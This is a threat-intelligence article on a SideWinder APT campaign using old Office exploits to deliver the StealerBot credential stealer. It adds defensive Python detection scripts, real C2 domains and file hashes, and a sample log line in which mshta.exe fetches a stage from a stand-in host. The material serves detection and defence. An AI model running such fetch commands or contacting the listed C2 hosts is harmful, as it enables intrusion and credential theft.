SideWinder APT Hackers Exploit Legacy Office Vulnerabilities to Deploy Malware Undetected
The Acronis Threat Research Unit (TRU) has revealed an advanced campaign believed to be orchestrated by the SideWinder advanced persistent threat (APT) group.
This operation, running through early 2025, has primarily targeted high-value government and military institutions across Sri Lanka, Bangladesh, and Pakistan, exploiting unpatched legacy Microsoft Office vulnerabilities to deploy credential-stealing malware while evading contemporary detection mechanisms.
At the heart of SideWinder’s strategy is a blend of old and new: attackers craft spear-phishing emails that impersonate local governmental bodies or high-level organizations, embedding malicious Word or RTF attachments.
These documents exploit CVE-2017-0199 and CVE-2017-11882, vulnerabilities that have persisted in many organizations due to inadequate patch management.

CVE-2017-0199 enables remote code execution by leveraging malicious external object references in Office files, while CVE-2017-11882 abuses a memory corruption bug in the legacy Equation Editor component, allowing attackers to execute arbitrary code upon document opening.
Uniquely, SideWinder integrates geofenced payload distribution: the attackers’ servers deliver the next infection stage only if the victim’s IP address and User-Agent header match the intended targets in Bangladesh, Sri Lanka, or Pakistan.

Non-targeted users receive benign decoy documents or error messages, thwarting analysis and minimizing detection.
Once the exploitation chain begins, a shellcode-based loader, embedded within the RTF payload, triggers.
This shellcode is heavily obfuscated, employing memory inspection and sandbox evasion techniques, only advancing if the environment appears legitimate.
It downloads a second-stage binary, individually encoded for each victim by server-side polymorphism, and injects it into a trusted process (typically explorer.exe) using classic Windows API methods like VirtualAllocEx and CreateRemoteThread.
Credential Harvesting
The third-stage payload is a DLL known internally as “StealerBot.CppInstallerDocx.dll.”
This module, executed via rundll32.exe or by DLL sideloading through a legitimate signed executable (TapiUnattend.exe), collects a wide array of sensitive data: usernames, system specifications, drive details, MAC address, network configuration, and installed AV products.
This information is base64-encoded, obfuscated, and sent back to the command-and-control (C2) server, which is frequently rotated to evade IP/domain blocklists.
The attackers employ persistence via Windows Startup folder LNK (shortcut) files that trigger the malicious chain on reboot.
Further, the final malware components are protected with XOR encoding and loaded in-memory, avoiding disk writes and complicating forensics.
StealerBot is proficient at both exfiltrating credentials and maintaining access, using stealthy communications and layering encrypted C2 channels with dynamic domain infrastructure.
Infrastructure and Targeting
TRU analysts observed a significant uptick in related malicious domains through early 2025, reflecting SideWinder’s resource commitment and operational tempo.
The C2 domains, registered in bursts and rotated frequently, are crafted to impersonate government, financial, or defense organizations, enhancing social engineering credibility.
The group’s lures are highly customized; notable examples include invitations to military events or official economic briefings, tailored for Sri Lanka’s Army 55 Division and the Central Bank of Sri Lanka’s IT directorate.
While the campaign references a broad range of high-value institutions, confirmed victimology is currently limited to the Sri Lankan and Bangladeshi military and financial sectors, indicating a combination of direct targeting and credibility-boosting impersonation in SideWinder’s phishing emails.
The attackers maintain operational security by generating unique payloads per target, using server-side polymorphism to frustrate signature-based detection and automatic sample correlation.
Organizations in South Asia, particularly those in government, military, or critical infrastructure, are urged to enforce immediate patching of legacy Office vulnerabilities, especially CVE-2017-0199 and CVE-2017-11882.
Disabling macros and external template loading, restricting the use of mshta.exe, wscript.exe, and powershell.exe, and deploying behavioral detection tools that flag anomalous child processes or memory injection are critical steps.
Network-level filtering against known malicious domains and user education to recognize spear-phishing hallmarks are also essential to reduce risk.
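As an added illustration of the behavioral detection the article recommends (this is example code, not from Acronis TRU or the article), the following Python script applies three process-tree heuristics to constructed process-creation events: an Office or Equation Editor parent spawning a scripting or loader binary, rundll32.exe loading a DLL from a user-writable path, and the TapiUnattend.exe sideloading host running outside a system directory. The log format, the sample paths and the set of flagged binaries are assumptions, not values from the report.

```python
"""Process-tree heuristics for the Office-to-loader chain described above.

Added example, not code from Acronis TRU or the article.  The log format is a
constructed, simplified process-creation record (one event per line, four
tab-separated fields); the sample lines and paths below are assumptions.
"""

# Parents that should rarely launch scripting or loader binaries.  EQNEDT32.EXE
# (the Equation Editor abused by CVE-2017-11882) is included because, after
# exploitation, it is the process that spawns the next stage.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "eqnedt32.exe"}

# Children the article recommends restricting, plus the Equation Editor itself.
SUSPICIOUS_CHILDREN = {
    "eqnedt32.exe": "Equation Editor launched by Office (CVE-2017-11882 pattern)",
    "mshta.exe": "mshta.exe launched from Office process tree",
    "wscript.exe": "wscript.exe launched from Office process tree",
    "cscript.exe": "cscript.exe launched from Office process tree",
    "powershell.exe": "powershell.exe launched from Office process tree",
    "rundll32.exe": "rundll32.exe launched from Office process tree",
    "cmd.exe": "cmd.exe launched from Office process tree",
}

# Signed binary the article names as a sideloading host (assumption: a copy
# running outside a system directory is worth an alert).
SIDELOAD_HOSTS = {"tapiunattend.exe"}

# Path fragments that indicate a user-writable location (assumption).
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")

# Constructed sample log: ts<TAB>parent<TAB>image<TAB>cmdline
SAMPLE_LOG = "\n".join([
    "2025-03-01T09:12:01Z\texplorer.exe\twinword.exe\t\"C:\\Program Files\\Microsoft Office\\WINWORD.EXE\" invite.docx",
    "2025-03-01T09:12:04Z\twinword.exe\teqnedt32.exe\t\"C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding",
    "2025-03-01T09:12:05Z\teqnedt32.exe\tmshta.exe\tmshta.exe http://stage2.example.invalid/a",
    "2025-03-01T09:12:09Z\texplorer.exe\trundll32.exe\trundll32.exe C:\\Users\\u\\AppData\\Roaming\\StealerBot.CppInstallerDocx.dll,Start",
    "2025-03-01T09:12:10Z\texplorer.exe\tTapiUnattend.exe\tC:\\Users\\u\\AppData\\Local\\Temp\\TapiUnattend.exe",
    "2025-03-01T09:30:00Z\texplorer.exe\tchrome.exe\t\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"",
])


def parse_events(log_text):
    """Split each line into its four fields; skip blank or malformed lines."""
    events = []
    for line in log_text.splitlines():
        parts = line.split("\t", 3)
        if len(parts) != 4:
            continue
        ts, parent, image, cmdline = parts
        events.append({"ts": ts, "parent": parent.lower(),
                       "image": image.lower(), "cmdline": cmdline})
    return events


def in_user_writable(path):
    """True if the command line references a user-writable directory."""
    p = path.lower()
    return any(fragment in p for fragment in USER_WRITABLE)


def analyze(log_text):
    """Return one alert dict per matched heuristic, in log order."""
    alerts = []
    for ev in parse_events(log_text):
        parent, image, cmd = ev["parent"], ev["image"], ev["cmdline"]
        if parent in OFFICE_PARENTS and image in SUSPICIOUS_CHILDREN:
            alerts.append({"ts": ev["ts"], "rule": "office_child",
                           "detail": f"{parent} -> {image}: {SUSPICIOUS_CHILDREN[image]}"})
        if image == "rundll32.exe" and in_user_writable(cmd):
            alerts.append({"ts": ev["ts"], "rule": "rundll32_user_path",
                           "detail": f"rundll32 loading a DLL from a user-writable path: {cmd}"})
        if image in SIDELOAD_HOSTS and in_user_writable(cmd):
            alerts.append({"ts": ev["ts"], "rule": "sideload_host_user_path",
                           "detail": f"signed sideload host running outside a system directory: {cmd}"})
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG):
        print(a["ts"], a["rule"], a["detail"])
```

On the constructed sample the script raises four alerts: the Equation Editor spawned by Word, mshta.exe spawned by the Equation Editor, rundll32.exe loading a DLL from a roaming profile, and TapiUnattend.exe running from a temp directory; the Word launch itself and the browser start are left alone. In production the same rules map onto Sysmon event ID 1 or EDR process-creation telemetry, and the user-writable path list should be tuned to the estate.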
This campaign reinforces how resilience against well-known exploits demands not just advanced detection, but also relentless attention to basic security hygiene.
SideWinder’s evolving tactics, combining geofenced distribution, shellcode loaders, DLL sideloading, and rapid infrastructure churn, demonstrate the persistent threat posed by APTs leveraging “forgotten” vulnerabilities.
Indicators of Compromise (IOCs)
| Type | Indicator | Description |
|---|---|---|
| SHA256 Doc | 57b9744b30903c7741e9966882815e1467be1115cbd6798ad4bfb3d334d3523d | Malicious DOC, “Caution Against Propaganda…” |
| SHA256 RTF | e4afb43a13e043d99ff0fb0a0ac49e96a04932ba37365527914d6be779597edf | Exploit RTF, CVE-2017-11882 |
| SHA256 Payload | 61132f15775224f8aae02499b90b6bc19d4b3b44d987e0323276dceb260cc407 | Stage 3, StealerBot DLL |
| SHA256 DLL | c62e365a6a60e0db4c2afd497464accdb783c336b116a5bc7806a4c47b539cc5 | Final unencrypted StealerBot sample |
| Domain | advisory[.]army-govbd[.]info | C2 infrastructure |
| Domain | updates-installer[.]store | C2 infrastructure |
| Domain | dwnlld[.]com | C2 infrastructure |
| Domain | bismi[.]pro | C2 infrastructure |
| C2 Panel URL | hxxps://ecility[.]xyz | StealerBot control panel |
| File | TapiUnattend.exe (MD5: b574abf43dcc57a359129d1adb4cdda0) | Legitimate executable used for DLL sideloading |
| File | wdscore.dll (MD5: b37522b69406b3f6229b7f3bbef0a293) | Malicious DLL loader |
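As an added example of putting the table above to use (example code, not from the article or Acronis TRU), the following Python refangs the published domain and URL indicators, matches DNS query names against them including subdomains, and matches file digests against the published hashes. The indicator values are copied from the table; the DNS and file-inventory log lines and their formats are constructed assumptions.

```python
"""Refang the IOCs from the table above and match them against sample logs.

Added example, not part of the article or Acronis TRU's tooling.  Indicator
values are copied from the table; the DNS and file-inventory log lines are
constructed, and their formats are assumptions.
"""
import re

# Domains and the panel URL, as published (defanged with [.] and hxxps).
IOC_NETWORK = [
    "advisory[.]army-govbd[.]info",
    "updates-installer[.]store",
    "dwnlld[.]com",
    "bismi[.]pro",
    "hxxps://ecility[.]xyz",
]

# File hashes from the table, keyed by lowercase hex digest.
IOC_HASHES = {
    "57b9744b30903c7741e9966882815e1467be1115cbd6798ad4bfb3d334d3523d": "Malicious DOC",
    "e4afb43a13e043d99ff0fb0a0ac49e96a04932ba37365527914d6be779597edf": "Exploit RTF (CVE-2017-11882)",
    "61132f15775224f8aae02499b90b6bc19d4b3b44d987e0323276dceb260cc407": "Stage 3 StealerBot DLL",
    "c62e365a6a60e0db4c2afd497464accdb783c336b116a5bc7806a4c47b539cc5": "Final StealerBot sample",
    "b574abf43dcc57a359129d1adb4cdda0": "TapiUnattend.exe (sideloading host)",
    "b37522b69406b3f6229b7f3bbef0a293": "wdscore.dll (malicious loader)",
}


def refang(indicator):
    """Reverse the usual defanging: [.] -> . and hxxp(s):// -> http(s)://."""
    s = indicator.strip().replace("[.]", ".").replace("(.)", ".")
    return re.sub(r"^hxxp", "http", s, flags=re.IGNORECASE)


def host_of(indicator):
    """Reduce a domain or URL indicator to its lowercase hostname."""
    s = re.sub(r"^[a-z]+://", "", refang(indicator), flags=re.IGNORECASE)
    return s.split("/", 1)[0].lower()


IOC_HOSTS = {host_of(i) for i in IOC_NETWORK}


def host_matches(queried, iocs=IOC_HOSTS):
    """Return the IOC host if `queried` is it or one of its subdomains.

    The suffix test is anchored on a dot so that a lookalike such as
    notbismi.pro does not match bismi.pro.
    """
    q = queried.lower().rstrip(".")
    for ioc in iocs:
        if q == ioc or q.endswith("." + ioc):
            return ioc
    return None


# Constructed DNS query log: ts client qtype qname
SAMPLE_DNS = """\
2025-03-02T10:00:01Z 10.0.0.15 A advisory.army-govbd.info
2025-03-02T10:00:02Z 10.0.0.15 A www.microsoft.com
2025-03-02T10:00:03Z 10.0.0.22 A cdn.dwnlld.com
2025-03-02T10:00:04Z 10.0.0.22 A notbismi.pro
2025-03-02T10:00:05Z 10.0.0.30 A ecility.xyz
"""

# Constructed file inventory: host path algo=digest (paths without spaces)
SAMPLE_FILES = """\
hostA C:\\Users\\u\\Downloads\\invite.docx sha256=57B9744B30903C7741E9966882815E1467BE1115CBD6798AD4BFB3D334D3523D
hostA C:\\Users\\u\\AppData\\Local\\Temp\\TapiUnattend.exe md5=b574abf43dcc57a359129d1adb4cdda0
hostB C:\\Windows\\System32\\notepad.exe sha256=0000000000000000000000000000000000000000000000000000000000000000
"""

HASH_RE = re.compile(r"\b(sha256|md5)=([0-9a-fA-F]{32,64})\b")


def match_dns(log_text):
    """Return (client, qname, matched_ioc) for every hit in the DNS log."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ioc = host_matches(parts[3])
        if ioc:
            hits.append((parts[1], parts[3], ioc))
    return hits


def match_files(log_text):
    """Return (host, path, description) for every file whose digest is an IOC."""
    hits = []
    for line in log_text.splitlines():
        m = HASH_RE.search(line)
        if not m:
            continue
        desc = IOC_HASHES.get(m.group(2).lower())
        if desc:
            host, path = line.split(None, 2)[:2]
            hits.append((host, path, desc))
    return hits
```

Against the constructed logs, `match_dns` reports the exact hit on advisory.army-govbd.info, the subdomain cdn.dwnlld.com and the panel host ecility.xyz while ignoring notbismi.pro, and `match_files` reports the DOC hash (case-insensitively) and the MD5 of the TapiUnattend.exe copy in a temp directory. Domain indicators rotate quickly in this campaign, so a hit list like this should be refreshed from the vendor feed rather than treated as static.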